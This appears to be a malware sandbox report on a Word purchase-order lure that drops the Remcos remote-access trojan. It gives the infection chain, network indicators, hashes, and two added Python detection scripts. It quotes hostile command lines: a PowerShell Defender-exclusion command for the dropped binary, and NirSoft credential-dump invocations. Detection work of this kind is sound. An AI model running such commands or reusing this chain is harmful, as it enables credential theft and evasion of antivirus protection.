Analysis Overview
SHA256
64d86549103287f488f4086139984d1be9781da6b6efc7902f03a348e664164c
Threat Level: Known bad
The file PO 00082811.docx.doc was found to be: Known bad.
Malicious Activity Summary
Remcos
Detected Nirsoft tools
NirSoft MailPassView
Credentials from Password Stores: Credentials from Web Browsers
NirSoft WebBrowserPassView
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Launches Equation Editor
Checks processor information in registry
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
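The "Abuses OpenXML format to download file from external location" entry above refers to a relationship inside the .docx package whose target is an external URL rather than a part of the archive; in the behavioral1 run the fetched object turns up in the IE cache as eWjsdnqwKllAbeP[1].doc after contact with asmlholdings.top. The script below is an added example, not part of the sandbox report, showing how to check a package for such relationships statically. The document it builds is constructed for the demo, and the full URL used in the `__main__` block is an assumption (the report lists the host and the cached file name separately, never the URL).

```python
"""Static check for the 'Abuses OpenXML format to download file from external
location' behaviour: walk every *.rels part in a .docx package and report
relationships whose TargetMode is External. Added example; not the sandbox's
own logic. The document built by build_sample_docx() is constructed here and
only imitates the structure of such a lure."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves without the user clicking anything.
FETCHED_ON_OPEN = {
    OFFICE_REL + "oleObject",          # embedded/linked OLE object
    OFFICE_REL + "attachedTemplate",   # remote template
    OFFICE_REL + "frame",              # frameset
    OFFICE_REL + "image",              # linked picture
}


def external_relationships(docx_bytes):
    """Return [(rels_part, rel_type, target)] for each TargetMode="External"
    relationship found in any .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def classify(docx_bytes):
    """Three-tier verdict: 'suspicious' when an external relationship of a
    fetched-on-open type points at an http(s) URL, 'review' when any other
    external relationship exists (file:// and UNC targets are still worth a
    look), else 'clean'. Returns (verdict, hits)."""
    hits = external_relationships(docx_bytes)
    for _, rel_type, target in hits:
        if rel_type in FETCHED_ON_OPEN and target.lower().startswith(("http://", "https://")):
            return "suspicious", hits
    return ("review" if hits else "clean"), hits


def build_sample_docx(external_target=None):
    """Minimal docx package. When external_target is given, the main part's
    .rels carries an external oleObject relationship to it (constructed)."""
    doc_rels = [
        '<Relationships xmlns="%s">' % REL_NS,
        '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>' % OFFICE_REL,
    ]
    if external_target:
        doc_rels.append('<Relationship Id="rId2" Type="%soleObject" Target="%s" TargetMode="External"/>'
                        % (OFFICE_REL, external_target))
    doc_rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels",
                   '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sofficeDocument" '
                   'Target="word/document.xml"/></Relationships>' % (REL_NS, OFFICE_REL))
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels", "\n".join(doc_rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Assumed URL: the report shows the host asmlholdings.top and the cached
    # file name eWjsdnqwKllAbeP[1].doc separately, never the full URL.
    sample = build_sample_docx("https://asmlholdings.top/eWjsdnqwKllAbeP.doc")
    print(classify(sample))
```

Relationships live in every `*.rels` part, not only `word/_rels/document.xml.rels`, so the scan walks the whole archive; headers, footers and embedded parts can carry their own external targets.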
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 09:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 09:09
Reported
2024-08-09 09:12
Platform
win7-20240708-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Abuses OpenXML format to download file from external location
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2112 set thread context of 904 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 2508 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 1516 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 2220 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO 00082811.docx"
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\zyekrjup"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\zyekrjup"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\jsrvstfjnkqv"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\jsrvstfjnkqv"
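The process list above is the whole chain in one place: Word opens the lure, the Equation Editor is activated by COM (`-Embedding`) and spawns the dropped fkslfile21.exe from AppData\Roaming, that binary launches PowerShell to add a Defender exclusion for itself, re-launches itself, and the re-launched copy runs three children with NirSoft's `/stext` output switch (the NirSoft MailPassView and WebBrowserPassView signatures). The detector below is an added example, not the sandbox's own logic, run over telemetry records constructed from those command lines. The record layout and the parent PIDs are assumptions; only the PIDs 2112, 904, 2508, 1516 and 2220 come from the report's SetThreadContext table.

```python
"""Process-telemetry rules for the chain seen in behavioral1. Added example,
not part of the sandbox report. EVENTS is constructed from the report's
command lines; the (pid, ppid, image, cmdline) layout and the parent PIDs
are assumptions."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed telemetry. EQNEDT32.EXE is given a non-Word parent on purpose:
# the -Embedding switch means it was started by COM activation, not by Word.
EVENTS = [
    (2976, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO 00082811.docx"'),
    (2300, 600, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    (2112, 2300, r"C:\Users\Admin\AppData\Roaming\fkslfile21.exe",
     r'"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"'),
    (2400, 2112, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\fkslfile21.exe"'),
    (904, 2112, r"C:\Users\Admin\AppData\Roaming\fkslfile21.exe",
     r'"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"'),
    (2508, 904, r"C:\Users\Admin\AppData\Roaming\fkslfile21.exe",
     r'C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"'),
    (1516, 904, r"C:\Users\Admin\AppData\Roaming\fkslfile21.exe",
     r'C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\zyekrjup"'),
    (2220, 904, r"C:\Users\Admin\AppData\Roaming\fkslfile21.exe",
     r'C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\jsrvstfjnkqv"'),
]

USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\")


def is_user_writable(path):
    """True for locations a non-admin user can write to (lower-cased match)."""
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def detect(events):
    """Return a sorted list of (rule, pid) findings over process records."""
    procs = {e.pid: e for e in (Proc(*t) for t in events)}
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        image, cmd = p.image.lower(), p.cmdline.lower()

        # Equation Editor should never start executables from a user-writable path.
        if parent and parent.image.lower().endswith("\\eqnedt32.exe") and is_user_writable(image):
            findings.append(("equation_editor_spawns_dropped_exe", p.pid))

        # Match the image, not the command line: under WOW64 the command line
        # says System32 while the image actually loaded is under SysWOW64.
        if image.endswith("\\powershell.exe") and "add-mppreference" in cmd:
            m = re.search(r'-exclusionpath\s+(?:"([^"]+)"|(\S+))', cmd)
            excluded = (m.group(1) or m.group(2)) if m else ""
            rule = "defender_exclusion_for_user_path" if is_user_writable(excluded) \
                else "defender_exclusion_added"
            findings.append((rule, p.pid))

        # NirSoft recovery tools write their results with /stext <file>.
        if re.search(r"\s/stext\s", cmd):
            findings.append(("nirsoft_stext_dump", p.pid))

        # A binary in a user path re-launching itself is the usual prelude
        # to the SetThreadContext/WriteProcessMemory pattern in the report.
        if parent and parent.image.lower() == image and is_user_writable(image):
            findings.append(("self_relaunch_from_user_path", p.pid))
    return sorted(findings, key=lambda f: (f[1], f[0]))


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(pid, rule)
```

Keying the first rule on EQNEDT32.EXE as the parent, rather than on WINWORD, is deliberate: a COM-activated Equation Editor does not appear under Word in the process tree, so a "Word spawned an exe" rule misses this chain entirely.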
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | asmlholdings.top | udp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.179.131:80 | c.pki.goog | tcp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 212.162.149.80:2404 | | tcp |
| US | 212.162.149.80:2404 | | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.16.170.49:80 | crl.microsoft.com | tcp |
Files
memory/2976-0-0x000000002FF31000-0x000000002FF32000-memory.dmp
memory/2976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-2-0x000000007124D000-0x0000000071258000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
| MD5 | 76ca99c232272f8eba8fb42bcbd6f8b4 |
| SHA1 | c9f78f83b6bf53c7aa8165080c02ddb29931407c |
| SHA256 | 73efa1fc62f44bab3aaae79eb1aa5c6b9eae0e996207a4fd8109cc4efe12a50f |
| SHA512 | a966cee4770971768df979ab31998758341a4692998394edc2f17eab257d61c5a3e2131e84803ecfdca05e1dcfec4fd846506aa281b0ca4b8f895640b8896ba9 |
C:\Users\Admin\AppData\Local\Temp\{09ABBF4E-A3B0-4E9E-8437-B1D743D1821E}
| MD5 | ed62ad47597553c189bd5cf09f5ca7e4 |
| SHA1 | 65eb35d0663cd947fe767f83f96107fee5fd596d |
| SHA256 | 22be7873ff5060f840269f911c6c20c3afd77e6279b31b45aea07338e7f2af19 |
| SHA512 | 31eeb1af3f22faa542527fbdc2f3928ee9410877b23245dc9d3ec2fc2ffa49b6c6e3ab69eaf5cace6af62e493e91b409b5f4503732bd0ffdd30450b149fd0a29 |
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2D10BE76-1712-4575-B3A1-6CCA930A57BB}.FSD
| MD5 | d5f67793d59f0331b72bb5689486e6df |
| SHA1 | 0a2cb10289ca361b4dd84faa3e64e9e37ae5f13d |
| SHA256 | 50921d1a029d2533e67748915261568be22871c20d43eb79da17fbfe2be81666 |
| SHA512 | a7df6e7e2c896f04f915edac5d65fee9bdf7d75c0dc9783d413b781cbafa6828836a00ca103253502c136e4a630bb00aa4846258fba45ef926ea0e5e32fa3b27 |
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
| MD5 | 02182dd04c30e71ff8e8a9bdd049854e |
| SHA1 | 7ede6685b5335da445ed545ca38f8bed8351adda |
| SHA256 | 536674718e4c70fdc4082523b6f2450be31cee66340eefa24f88501395350bec |
| SHA512 | 1269087a90496b038a1a2c6af95fc5e847ae5034c7bed23799173cdff7205ecbc90de37e11b7912c93b749c24e3205443aede1706151f272c0310078dce3cfd6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\eWjsdnqwKllAbeP[1].doc
| MD5 | f7e4812fd83625cdfe19159f6d2fefa9 |
| SHA1 | 15a20c40783e01f60135619b8358d1f1df0beb14 |
| SHA256 | fa22ac754b94cc3093cad88b03f0d2b1aa4b4c52a494c7a0b1db761acffbb5e7 |
| SHA512 | 51bfab21f0d18c4c7bcdfff776cb771949bdf29f43dab37767fb6d7cc64bb8996d730b39aa949b5f12d991dcd1e7cbbd953301581877bf165fd03c5ed33ef23d |
C:\Users\Admin\AppData\Local\Temp\CabCD9B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 8117ef283f8c3b7fbc82866ce09051f8 |
| SHA1 | 10c506db72a600858cb688125785e8729a1c95b2 |
| SHA256 | d7c859d434643ae90eb12a8d3831d4d93988d3caf165a03b30c2f7968ce8ac7a |
| SHA512 | 4e487daec6e1197cffb5651f5e9d06f129a3d6dc404fe8de2dafa0daef03af57481c8b82d62d7166c74d92da348ae8d9b01debe26012ac9fe957d23416abee23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 7fb5fa1534dcf77f2125b2403b30a0ee |
| SHA1 | 365d96812a69ac0a4611ea4b70a3f306576cc3ea |
| SHA256 | 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f |
| SHA512 | a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | c81af9eba1799dbea4cd8341d8081f12 |
| SHA1 | bc59dd9c68cf82ad5a3ce1807b9fa365aad30542 |
| SHA256 | 57b01bd008ef7aa7037c887f9a28843236a5fa2e72b4404a1de6f809e9d25f62 |
| SHA512 | 3ba3032aa3ba1b44be7fe66d02c1b11d58358d127e2a1914a901b0c081dd5cce41ae5e52ed5eee337399cb465759e834b23ee496823f889008dde2d67ba4cc93 |
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
| MD5 | 7b1741b5341b1cd8293ac7a054bfc1e0 |
| SHA1 | 80b5a55aefd1385e6d87b776af30e12efeb026dc |
| SHA256 | dc63815bd59981625914b0f9e0699b93d6c7e40020ff738a8c44a49c4f7afcd4 |
| SHA512 | 0f9f0489b3abbc77da870882306a0967071dc35f543e8da80d582a2c1765548a80fe4854b87934f34239b2ae4fa1e44485ead934036b1793fbc947327398a07e |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 9afb4156fa5814747c97dc5fc166473b |
| SHA1 | 1cf3168eba7c2ced7d3d881f29425ea85c392241 |
| SHA256 | ea8d899f248ad0eb602639ce80b6a4af9967151e4c1099da750ece5085e23775 |
| SHA512 | 0811aecc4768c531814d9b99b041651dd50d545cfecc189e7f5fae352b5bd9fa36f15a98730c6e3eb67c41cb528ad31f2c07eea38784d186ff083fb13bc7d96a |
memory/2112-121-0x0000000000180000-0x000000000027E000-memory.dmp
memory/2112-127-0x0000000001E00000-0x0000000001E1A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2112-139-0x0000000001E70000-0x0000000001E86000-memory.dmp
memory/2112-138-0x0000000001E60000-0x0000000001E6E000-memory.dmp
memory/2112-140-0x00000000057F0000-0x00000000058B0000-memory.dmp
memory/904-145-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-147-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-167-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-166-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-163-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-162-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-157-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-155-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-153-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-151-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-149-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-160-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-143-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-159-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/904-170-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-171-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-172-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-173-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-175-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2508-179-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1516-184-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2508-192-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2220-194-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2220-193-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2220-190-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1516-188-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1516-187-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2508-182-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2976-201-0x000000007124D000-0x0000000071258000-memory.dmp
memory/904-202-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-206-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-205-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-207-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-212-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-211-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 05c935742d496328d65a234026135c2e |
| SHA1 | 1098096ee5770d53a1978e859bc7db121dd3901d |
